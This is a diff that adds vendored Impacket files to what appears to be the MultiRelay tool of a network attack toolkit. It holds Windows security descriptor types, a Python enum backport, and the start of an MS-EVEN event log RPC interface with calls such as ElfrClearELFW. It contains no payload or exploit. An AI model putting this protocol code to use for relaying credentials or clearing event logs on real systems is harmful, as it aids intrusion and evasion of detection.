+            self['SubAuthority'].append(int(items[i+3]))
+
+    def formatCanonical(self):
+        ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority'][5:6]))
+        for i in range(self['SubAuthorityCount']):
+            ans += '-%d' % self['SubAuthority'][i]
+        return ans
+
+class PRPC_SID(NDRPOINTER):
+    referent = (
+        ('Data', RPC_SID),
+    )
+
+PSID = PRPC_SID
+
+# 2.4.3 ACCESS_MASK
+GENERIC_READ            = 0x80000000
+GENERIC_WRITE           = 0x40000000
+GENERIC_EXECUTE         = 0x20000000
+GENERIC_ALL             = 0x10000000
+MAXIMUM_ALLOWED         = 0x02000000
+ACCESS_SYSTEM_SECURITY  = 0x01000000
+SYNCHRONIZE             = 0x00100000
+WRITE_OWNER             = 0x00080000
+WRITE_DACL              = 0x00040000
+READ_CONTROL            = 0x00020000
+DELETE                  = 0x00010000
+
+# 2.4.5.1 ACL--RPC Representation
+class ACL(NDRSTRUCT):
+    structure = (
+        ('AclRevision',NDRSMALL),
+        ('Sbz1',NDRSMALL),
+        ('AclSize',NDRSHORT),
+        ('AceCount',NDRSHORT),
+        ('Sbz2',NDRSHORT),
+    )
+
+class PACL(NDRPOINTER):
+    referent = (
+        ('Data', ACL),
+    )
+
+# 2.4.6.1 SECURITY_DESCRIPTOR--RPC Representation
+class SECURITY_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Revision',UCHAR),
+        ('Sbz1',UCHAR),
+        ('Control',USHORT),
+        ('Owner',PSID),
+        ('Group',PSID),
+        ('Sacl',PACL),
+        ('Dacl',PACL),
+    )
+
+# 2.4.7 SECURITY_INFORMATION
+OWNER_SECURITY_INFORMATION            = 0x00000001
+GROUP_SECURITY_INFORMATION            = 0x00000002
+DACL_SECURITY_INFORMATION             = 0x00000004
+SACL_SECURITY_INFORMATION             = 0x00000008
+LABEL_SECURITY_INFORMATION            = 0x00000010
+UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000
+UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000
+PROTECTED_SACL_SECURITY_INFORMATION   = 0x40000000
+PROTECTED_DACL_SECURITY_INFORMATION   = 0x80000000
+ATTRIBUTE_SECURITY_INFORMATION        = 0x00000020
+SCOPE_SECURITY_INFORMATION            = 0x00000040
+BACKUP_SECURITY_INFORMATION           = 0x00010000
+
+SECURITY_INFORMATION = DWORD
+class PSECURITY_INFORMATION(NDRPOINTER):
+    referent = (
+        ('Data', SECURITY_INFORMATION),
+    )

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/enum.py

@@ -0,0 +1,754 @@
+"""Python Enumerations"""
+
+import sys as _sys
+
+__all__ = ['Enum', 'IntEnum', 'unique']
+
+pyver = float('%s.%s' % _sys.version_info[:2])
+
+try:
+    any
+except NameError:
+    def any(iterable):
+        for element in iterable:
+            if element:
+                return True
+        return False
+
+
+class _RouteClassAttributeToGetattr(object):
+    """Route attribute access on a class to __getattr__.
+
+    This is a descriptor, used to define attributes that act differently when
+    accessed through an instance and through a class.  Instance access remains
+    normal, but access to an attribute through a class will be routed to the
+    class's __getattr__ method; this is done by raising AttributeError.
+
+    """
+    def __init__(self, fget=None):
+        self.fget = fget
+
+    def __get__(self, instance, ownerclass=None):
+        if instance is None:
+            raise AttributeError()
+        return self.fget(instance)
+
+    def __set__(self, instance, value):
+        raise AttributeError("can't set attribute")
+
+    def __delete__(self, instance):
+        raise AttributeError("can't delete attribute")
+
+
+def _is_descriptor(obj):
+    """Returns True if obj is a descriptor, False otherwise."""
+    return (
+            hasattr(obj, '__get__') or
+            hasattr(obj, '__set__') or
+            hasattr(obj, '__delete__'))
+
+
+def _is_dunder(name):
+    """Returns True if a __dunder__ name, False otherwise."""
+    return (name[:2] == name[-2:] == '__' and
+            name[2:3] != '_' and
+            name[-3:-2] != '_' and
+            len(name) > 4)
+
+
+def _is_sunder(name):
+    """Returns True if a _sunder_ name, False otherwise."""
+    return (name[0] == name[-1] == '_' and 
+            name[1:2] != '_' and
+            name[-2:-1] != '_' and
+            len(name) > 2)
+
+
+def _make_class_unpicklable(cls):
+    """Make the given class un-picklable."""
+    def _break_on_call_reduce(self):
+        raise TypeError('%r cannot be pickled' % self)
+    cls.__reduce__ = _break_on_call_reduce
+    cls.__module__ = '<unknown>'
+
+
+class _EnumDict(dict):
+    """Track enum member order and ensure member names are not reused.
+
+    EnumMeta will use the names found in self._member_names as the
+    enumeration member names.
+
+    """
+    def __init__(self):
+        super(_EnumDict, self).__init__()
+        self._member_names = []
+
+    def __setitem__(self, key, value):
+        """Changes anything not dundered or not a descriptor.
+
+        If a descriptor is added with the same name as an enum member, the name
+        is removed from _member_names (this may leave a hole in the numerical
+        sequence of values).
+
+        If an enum member name is used twice, an error is raised; duplicate
+        values are not checked for.
+
+        Single underscore (sunder) names are reserved.
+
+        Note:   in 3.x __order__ is simply discarded as a not necessary piece
+                leftover from 2.x
+
+        """
+        if pyver >= 3.0 and key == '__order__':
+                return
+        if _is_sunder(key):
+            raise ValueError('_names_ are reserved for future Enum use')
+        elif _is_dunder(key):
+            pass
+        elif key in self._member_names:
+            # descriptor overwriting an enum?
+            raise TypeError('Attempted to reuse key: %r' % key)
+        elif not _is_descriptor(value):
+            if key in self:
+                # enum overwriting a descriptor?
+                raise TypeError('Key already defined as: %r' % self[key])
+            self._member_names.append(key)
+        super(_EnumDict, self).__setitem__(key, value)
+
+
+# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until
+# EnumMeta finishes running the first time the Enum class doesn't exist.  This
+# is also why there are checks in EnumMeta like `if Enum is not None`
+Enum = None
+
+
+class EnumMeta(type):
+    """Metaclass for Enum"""
+    @classmethod
+    def __prepare__(metacls, cls, bases):
+        return _EnumDict()
+
+    def __new__(metacls, cls, bases, classdict):
+        # an Enum class is final once enumeration items have been defined; it
+        # cannot be mixed with other types (int, float, etc.) if it has an
+        # inherited __new__ unless a new __new__ is defined (or the resulting
+        # class will fail).
+        if type(classdict) is dict:
+            original_dict = classdict
+            classdict = _EnumDict()
+            for k, v in original_dict.items():
+                classdict[k] = v
+
+        member_type, first_enum = metacls._get_mixins_(bases)
+        #if member_type is object:
+        #    use_args = False
+        #else:
+        #    use_args = True
+        __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
+                                                        first_enum)
+        # save enum items into separate mapping so they don't get baked into
+        # the new class
+        members = dict((k, classdict[k]) for k in classdict._member_names)
+        for name in classdict._member_names:
+            del classdict[name]
+
+        # py2 support for definition order
+        __order__ = classdict.get('__order__')
+        if __order__ is None:
+            __order__ = classdict._member_names
+            if pyver < 3.0:
+                order_specified = False
+            else:
+                order_specified = True
+        else:
+            del classdict['__order__']
+            order_specified = True
+            if pyver < 3.0:
+                __order__ = __order__.replace(',', ' ').split()
+                aliases = [name for name in members if name not in __order__]
+                __order__ += aliases
+
+        # check for illegal enum names (any others?)
+        invalid_names = set(members) & set(['mro'])
+        if invalid_names:
+            raise ValueError('Invalid enum member name(s): %s' % (
+                ', '.join(invalid_names), ))
+
+        # create our new Enum type
+        enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
+        enum_class._member_names_ = []               # names in random order
+        enum_class._member_map_ = {}                 # name->value map
+        enum_class._member_type_ = member_type
+
+        # Reverse value->name map for hashable values.
+        enum_class._value2member_map_ = {}
+
+        # check for a __getnewargs__, and if not present sabotage
+        # pickling, since it won't work anyway
+        if (member_type is not object and
+            member_type.__dict__.get('__getnewargs__') is None
+            ):
+            _make_class_unpicklable(enum_class)
+
+        # instantiate them, checking for duplicates as we go
+        # we instantiate first instead of checking for duplicates first in case
+        # a custom __new__ is doing something funky with the values -- such as
+        # auto-numbering ;)
+        if __new__ is None:
+            __new__ = enum_class.__new__
+        for member_name in __order__:
+            value = members[member_name]
+            if not isinstance(value, tuple):
+                args = (value, )
+            else:
+                args = value
+            if member_type is tuple:   # special case for tuple enums
+                args = (args, )     # wrap it one more time
+            if not use_args or not args:
+                enum_member = __new__(enum_class)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = value
+            else:
+                enum_member = __new__(enum_class, *args)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = member_type(*args)
+            value = enum_member._value_
+            enum_member._name_ = member_name
+            enum_member.__objclass__ = enum_class
+            enum_member.__init__(*args)
+            # If another member with the same value was already defined, the
+            # new member becomes an alias to the existing one.
+            for name, canonical_member in enum_class._member_map_.items():
+                if canonical_member.value == enum_member._value_:
+                    enum_member = canonical_member
+                    break
+            else:
+                # Aliases don't appear in member names (only in __members__).
+                enum_class._member_names_.append(member_name)
+            enum_class._member_map_[member_name] = enum_member
+            try:
+                # This may fail if value is not hashable. We can't add the value
+                # to the map, and by-value lookups for this value will be
+                # linear.
+                enum_class._value2member_map_[value] = enum_member
+            except TypeError:
+                pass
+
+        # in Python2.x we cannot know definition order, so go with value order
+        # unless __order__ was specified in the class definition
+        if not order_specified:
+            enum_class._member_names_ = [
+                e[0] for e in sorted(
+                [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],
+                 key=lambda t: t[1]._value_
+                        )]
+
+        # double check that repr and friends are not the mixin's or various
+        # things break (such as pickle)
+        if Enum is not None:
+            setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)
+        for name in ('__repr__', '__str__', '__format__'):
+            class_method = getattr(enum_class, name)
+            obj_method = getattr(member_type, name, None)
+            enum_method = getattr(first_enum, name, None)
+            if obj_method is not None and obj_method is class_method:
+                setattr(enum_class, name, enum_method)
+
+        # method resolution and int's are not playing nice
+        # Python's less than 2.6 use __cmp__
+
+        if pyver < 2.6:
+
+            if issubclass(enum_class, int):
+                setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))
+
+        elif pyver < 3.0:
+
+            if issubclass(enum_class, int):
+                for method in (
+                        '__le__',
+                        '__lt__',
+                        '__gt__',
+                        '__ge__',
+                        '__eq__',
+                        '__ne__',
+                        '__hash__',
+                        ):
+                    setattr(enum_class, method, getattr(int, method))
+
+        # replace any other __new__ with our own (as long as Enum is not None,
+        # anyway) -- again, this is to support pickle
+        if Enum is not None:
+            # if the user defined their own __new__, save it before it gets
+            # clobbered in case they subclass later
+            if save_new:
+                setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
+            setattr(enum_class, '__new__', Enum.__dict__['__new__'])
+        return enum_class
+
+    def __call__(cls, value, names=None, module=None, type=None):
+        """Either returns an existing member, or creates a new enum class.
+
+        This method is used both when an enum class is given a value to match
+        to an enumeration member (i.e. Color(3)) and for the functional API
+        (i.e. Color = Enum('Color', names='red green blue')).
+
+        When used for the functional API: `module`, if set, will be stored in
+        the new class' __module__ attribute; `type`, if set, will be mixed in
+        as the first base class.
+
+        Note: if `module` is not set this routine will attempt to discover the
+        calling module by walking the frame stack; if this is unsuccessful
+        the resulting class will not be pickleable.
+
+        """
+        if names is None:  # simple value lookup
+            return cls.__new__(cls, value)
+        # otherwise, functional API: we're creating a new Enum type
+        return cls._create_(value, names, module=module, type=type)
+
+    def __contains__(cls, member):
+        return isinstance(member, cls) and member.name in cls._member_map_
+
+    def __delattr__(cls, attr):
+        # nicer error message when someone tries to delete an attribute
+        # (see issue19025).
+        if attr in cls._member_map_:
+            raise AttributeError(
+                    "%s: cannot delete Enum member." % cls.__name__)
+        super(EnumMeta, cls).__delattr__(attr)
+
+    def __dir__(self):
+        return (['__class__', '__doc__', '__members__', '__module__'] +
+                self._member_names_)
+
+    @property
+    def __members__(cls):
+        """Returns a mapping of member name->value.
+
+        This mapping lists all enum members, including aliases. Note that this
+        is a copy of the internal mapping.
+
+        """
+        return cls._member_map_.copy()
+
+    def __getattr__(cls, name):
+        """Return the enum member matching `name`
+
+        We use __getattr__ instead of descriptors or inserting into the enum
+        class' __dict__ in order to support `name` and `value` being both
+        properties for enum members (which live in the class' __dict__) and
+        enum members themselves.
+
+        """
+        if _is_dunder(name):
+            raise AttributeError(name)
+        try:
+            return cls._member_map_[name]
+        except KeyError:
+            raise AttributeError(name)
+
+    def __getitem__(cls, name):
+        return cls._member_map_[name]
+
+    def __iter__(cls):
+        return (cls._member_map_[name] for name in cls._member_names_)
+
+    def __reversed__(cls):
+        return (cls._member_map_[name] for name in reversed(cls._member_names_))
+
+    def __len__(cls):
+        return len(cls._member_names_)
+
+    def __repr__(cls):
+        return "<enum %r>" % cls.__name__
+
+    def __setattr__(cls, name, value):
+        """Block attempts to reassign Enum members.
+
+        A simple assignment to the class namespace only changes one of the
+        several possible ways to get an Enum member from the Enum class,
+        resulting in an inconsistent Enumeration.
+
+        """
+        member_map = cls.__dict__.get('_member_map_', {})
+        if name in member_map:
+            raise AttributeError('Cannot reassign members.')
+        super(EnumMeta, cls).__setattr__(name, value)
+
+    def _create_(cls, class_name, names=None, module=None, type=None):
+        """Convenience method to create a new Enum class.
+
+        `names` can be:
+
+        * A string containing member names, separated either with spaces or
+          commas.  Values are auto-numbered from 1.
+        * An iterable of member names.  Values are auto-numbered from 1.
+        * An iterable of (member name, value) pairs.
+        * A mapping of member name -> value.
+
+        """
+        metacls = cls.__class__
+        if type is None:
+            bases = (cls, )
+        else:
+            bases = (type, cls)
+        classdict = metacls.__prepare__(class_name, bases)
+        __order__ = []
+
+        # special processing needed for names?
+        if isinstance(names, str):
+            names = names.replace(',', ' ').split()
+        if isinstance(names, (tuple, list)) and isinstance(names[0], str):
+            names = [(e, i+1) for (i, e) in enumerate(names)]
+
+        # Here, names is either an iterable of (name, value) or a mapping.
+        for item in names:
+            if isinstance(item, str):
+                member_name, member_value = item, names[item]
+            else:
+                member_name, member_value = item
+            classdict[member_name] = member_value
+            __order__.append(member_name)
+        # only set __order__ in classdict if name/value was not from a mapping
+        if not isinstance(item, str):
+            classdict['__order__'] = ' '.join(__order__)
+        enum_class = metacls.__new__(metacls, class_name, bases, classdict)
+
+        # TODO: replace the frame hack if a blessed way to know the calling
+        # module is ever developed
+        if module is None:
+            try:
+                module = _sys._getframe(2).f_globals['__name__']
+            except (AttributeError, ValueError):
+                pass
+        if module is None:
+            _make_class_unpicklable(enum_class)
+        else:
+            enum_class.__module__ = module
+
+        return enum_class
+
+    @staticmethod
+    def _get_mixins_(bases):
+        """Returns the type for creating enum members, and the first inherited
+        enum class.
+
+        bases: the tuple of bases that was given to __new__
+
+        """
+        if not bases or Enum is None:
+            return object, Enum
+        
+
+        # double check that we are not subclassing a class with existing
+        # enumeration members; while we're at it, see if any other data
+        # type has been mixed in so we can use the correct __new__
+        member_type = first_enum = None
+        for base in bases:
+            if  (base is not Enum and
+                    issubclass(base, Enum) and
+                    base._member_names_):
+                raise TypeError("Cannot extend enumerations")
+        # base is now the last base in bases
+        if not issubclass(base, Enum):
+            raise TypeError("new enumerations must be created as "
+                    "`ClassName([mixin_type,] enum_type)`")
+
+        # get correct mix-in type (either mix-in type of Enum subclass, or
+        # first base if last base is Enum)
+        if not issubclass(bases[0], Enum):
+            member_type = bases[0]     # first data type
+            first_enum = bases[-1]  # enum type
+        else:
+            for base in bases[0].__mro__:
+                # most common: (IntEnum, int, Enum, object)
+                # possible:    (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>,
+                #               <class 'int'>, <Enum 'Enum'>,
+                #               <class 'object'>)
+                if issubclass(base, Enum):
+                    if first_enum is None:
+                        first_enum = base
+                else:
+                    if member_type is None:
+                        member_type = base
+
+        return member_type, first_enum
+
+    if pyver < 3.0:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+            if __new__:
+                return None, True, True      # __new__, save_new, use_args
+
+            N__new__ = getattr(None, '__new__')
+            O__new__ = getattr(object, '__new__')
+            if Enum is None:
+                E__new__ = N__new__
+            else:
+                E__new__ = Enum.__dict__['__new__']
+            # check all possibles for __member_new__ before falling back to
+            # __new__
+            for method in ('__member_new__', '__new__'):
+                for possible in (member_type, first_enum):
+                    try:
+                        target = possible.__dict__[method]
+                    except (AttributeError, KeyError):
+                        target = getattr(possible, method, None)
+                    if target not in [
+                            None,
+                            N__new__,
+                            O__new__,
+                            E__new__,
+                            ]:
+                        if method == '__member_new__':
+                            classdict['__new__'] = target
+                            return None, False, True
+                        if isinstance(target, staticmethod):
+                            target = target.__get__(member_type)
+                        __new__ = target
+                        break
+                if __new__ is not None:
+                    break
+            else:
+                __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, False, use_args
+    else:
+        @staticmethod
+        def _find_new_(classdict, member_type, first_enum):
+            """Returns the __new__ to be used for creating the enum members.
+
+            classdict: the class dictionary given to __new__
+            member_type: the data type whose __new__ will be used by default
+            first_enum: enumeration to check for an overriding __new__
+
+            """
+            # now find the correct __new__, checking to see of one was defined
+            # by the user; also check earlier enum classes in case a __new__ was
+            # saved as __member_new__
+            __new__ = classdict.get('__new__', None)
+
+            # should __new__ be saved as __member_new__ later?
+            save_new = __new__ is not None
+
+            if __new__ is None:
+                # check all possibles for __member_new__ before falling back to
+                # __new__
+                for method in ('__member_new__', '__new__'):
+                    for possible in (member_type, first_enum):
+                        target = getattr(possible, method, None)
+                        if target not in (
+                                None,
+                                None.__new__,
+                                object.__new__,
+                                Enum.__new__,
+                                ):
+                            __new__ = target
+                            break
+                    if __new__ is not None:
+                        break
+                else:
+                    __new__ = object.__new__
+
+            # if a non-object.__new__ is used then whatever value/tuple was
+            # assigned to the enum member name will be passed to __new__ and to the
+            # new enum member's __init__
+            if __new__ is object.__new__:
+                use_args = False
+            else:
+                use_args = True
+
+            return __new__, save_new, use_args
+
+
+########################################################
+# In order to support Python 2 and 3 with a single
+# codebase we have to create the Enum methods separately
+# and then use the `type(name, bases, dict)` method to
+# create the class.
+########################################################
+temp_enum_dict = {}
+temp_enum_dict['__doc__'] = "Generic enumeration.\n\n    Derive from this class to define new enumerations.\n\n"
+
+def __new__(cls, value):
+    # all enum instances are actually created during class construction
+    # without calling this method; this method is called by the metaclass'
+    # __call__ (i.e. Color(3) ), and by pickle
+    if type(value) is cls:
+        # For lookups like Color(Color.red)
+        value = value.value
+        #return value
+    # by-value search for a matching enum member
+    # see if it's in the reverse mapping (for hashable values)
+    try:
+        if value in cls._value2member_map_:
+            return cls._value2member_map_[value]
+    except TypeError:
+        # not there, now do long search -- O(n) behavior
+        for member in cls._member_map_.values():
+            if member.value == value:
+                return member
+    raise ValueError("%s is not a valid %s" % (value, cls.__name__))
+temp_enum_dict['__new__'] = __new__
+del __new__
+
+def __repr__(self):
+    return "<%s.%s: %r>" % (
+            self.__class__.__name__, self._name_, self._value_)
+temp_enum_dict['__repr__'] = __repr__
+del __repr__
+
+def __str__(self):
+    return "%s.%s" % (self.__class__.__name__, self._name_)
+temp_enum_dict['__str__'] = __str__
+del __str__
+
+def __dir__(self):
+    added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']
+    return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)
+temp_enum_dict['__dir__'] = __dir__
+del __dir__
+
+def __format__(self, format_spec):
+    # mixed-in Enums should use the mixed-in type's __format__, otherwise
+    # we can get strange results with the Enum name showing up instead of
+    # the value
+
+    # pure Enum branch
+    if self._member_type_ is object:
+        cls = str
+        val = str(self)
+    # mix-in branch
+    else:
+        cls = self._member_type_
+        val = self.value
+    return cls.__format__(val, format_spec)
+temp_enum_dict['__format__'] = __format__
+del __format__
+
+
+####################################
+# Python's less than 2.6 use __cmp__
+
+if pyver < 2.6:
+
+    def __cmp__(self, other):
+        if type(other) is self.__class__:
+            if self is other:
+                return 0
+            return -1
+        return NotImplemented
+        raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__cmp__'] = __cmp__
+    del __cmp__
+
+else:
+
+    def __le__(self, other):
+        raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__le__'] = __le__
+    del __le__
+
+    def __lt__(self, other):
+        raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__lt__'] = __lt__
+    del __lt__
+
+    def __ge__(self, other):
+        raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__ge__'] = __ge__
+    del __ge__
+
+    def __gt__(self, other):
+        raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
+    temp_enum_dict['__gt__'] = __gt__
+    del __gt__
+    
+
+def __eq__(self, other):
+    if type(other) is self.__class__:
+        return self is other
+    return NotImplemented
+temp_enum_dict['__eq__'] = __eq__
+del __eq__
+
+def __ne__(self, other):
+    if type(other) is self.__class__:
+        return self is not other
+    return NotImplemented
+temp_enum_dict['__ne__'] = __ne__
+del __ne__
+
+def __getnewargs__(self):
+    return (self._value_, )
+temp_enum_dict['__getnewargs__'] = __getnewargs__
+del __getnewargs__
+
+def __hash__(self):
+    return hash(self._name_)
+temp_enum_dict['__hash__'] = __hash__
+del __hash__
+
+# _RouteClassAttributeToGetattr is used to provide access to the `name`
+# and `value` properties of enum members while keeping some measure of
+# protection from modification, while still allowing for an enumeration
+# to have members named `name` and `value`.  This works because enumeration
+# members are not set directly on the enum class -- __getattr__ is
+# used to look them up.
+
+@_RouteClassAttributeToGetattr
+def name(self):
+    return self._name_
+temp_enum_dict['name'] = name
+del name
+
+@_RouteClassAttributeToGetattr
+def value(self):
+    return self._value_
+temp_enum_dict['value'] = value
+del value
+
+Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
+del temp_enum_dict
+
+# Enum has now been created
+###########################
+
+class IntEnum(int, Enum):
+    """Enum where members are also (and must be) ints"""
+
+
+def unique(enumeration):
+    """Class decorator that ensures only unique members exist in an enumeration."""
+    duplicates = []
+    for name, member in enumeration.__members__.items():
+        if name != member.name:
+            duplicates.append((name, member.name))
+    if duplicates:
+        duplicate_names = ', '.join(
+                ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
+                )
+        raise ValueError('duplicate names found in %r: %s' %
+                (enumeration, duplicate_names)
+                )
+    return enumeration

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even.py

@@ -0,0 +1,400 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#         Itamar Mizrahi (@MrAnde7son)
+#
+# Description:
+#   [MS-EVEN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
+from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
+from impacket.structure import Structure
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_EVEN  = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 EventType
+EVENTLOG_SUCCESS           = 0x0000
+EVENTLOG_ERROR_TYPE        = 0x0001
+EVENTLOG_WARNING_TYPE      = 0x0002
+EVENTLOG_INFORMATION_TYPE  = 0x0004
+EVENTLOG_AUDIT_SUCCESS     = 0x0008
+EVENTLOG_AUDIT_FAILURE     = 0x0010
+
+# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
+#EVENTLOG_HANDLE_A
+EVENTLOG_HANDLE_W = LPWSTR
+
+# 2.2.9 Constants Used in Method Definitions
+MAX_STRINGS      = 0x00000100
+MAX_SINGLE_EVENT = 0x0003FFFF
+MAX_BATCH_BUFF   = 0x0007FFFF
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+EVENTLOG_SEQUENTIAL_READ = 0x00000001
+EVENTLOG_SEEK_READ       = 0x00000002
+
+EVENTLOG_FORWARDS_READ   = 0x00000004
+EVENTLOG_BACKWARDS_READ  = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class IELF_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        return 1
+
+# 2.2.3 EVENTLOGRECORD
+class EVENTLOGRECORD(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Reserved','<L=0'),
+        ('RecordNumber','<L=0'),
+        ('TimeGenerated','<L=0'),
+        ('TimeWritten','<L=0'),
+        ('EventID','<L=0'),
+        ('EventType','<H=0'),
+        ('NumStrings','<H=0'),
+        ('EventCategory','<H=0'),
+        ('ReservedFlags','<H=0'),
+        ('ClosingRecordNumber','<L=0'),
+        ('StringOffset','<L=0'),
+        ('UserSidLength','<L=0'),
+        ('UserSidOffset','<L=0'),
+        ('DataLength','<L=0'),
+        ('DataOffset','<L=0'),
+        ('SourceName','z'),
+        ('Computername','z'),
+        ('UserSidPadding',':'),
+        ('_UserSid','_-UserSid', 'self["UserSidLength"]'),
+        ('UserSid',':'),
+        ('Strings',':'),
+        ('_Data','_-Data', 'self["DataLength"]'),
+        ('Data',':'),
+        ('Padding',':'),
+        ('Length2','<L=0'),
+    )
+
+# 2.2.4 EVENTLOG_FULL_INFORMATION
+class EVENTLOG_FULL_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('dwFull', ULONG),
+    )
+
+# 2.2.8 RPC_CLIENT_ID
+class RPC_CLIENT_ID(NDRSTRUCT):
+    structure = (
+        ('UniqueProcess', ULONG),
+        ('UniqueThread', ULONG),
+    )
+
+# 2.2.12 RPC_STRING
+class RPC_STRING(NDRSTRUCT):
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            self['Length'] = len(value)
+            self['MaximumLength'] = len(value)
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None: msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.9 ElfrClearELFW (Opnum 0)
+class ElfrClearELFW(NDRCALL):
+    opnum = 0
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', PRPC_UNICODE_STRING),
+    )
+
+class ElfrClearELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 ElfrBackupELFW (Opnum 1)
+class ElfrBackupELFW(NDRCALL):
+    opnum = 1
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', RPC_UNICODE_STRING),
+    )
+
+class ElfrBackupELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.21 ElfrCloseEL (Opnum 2)
+class ElfrCloseEL(NDRCALL):
+    opnum = 2
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrCloseELResponse(NDRCALL):
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.18 ElfrNumberOfRecords (Opnum 4)
+class ElfrNumberOfRecords(NDRCALL):
+    opnum = 4
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrNumberOfRecordsResponse(NDRCALL):
+    structure = (
+        ('NumberOfRecords', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.19 ElfrOldestRecord (Opnum 5)
+class ElfrOldestRecord(NDRCALL):
+    opnum = 5
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrOldestRecordResponse(NDRCALL):
+    structure = (
+        ('OldestRecordNumber', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.3 ElfrOpenELW (Opnum 7)
+class ElfrOpenELW(NDRCALL):
+    opnum = 7
+    structure = (
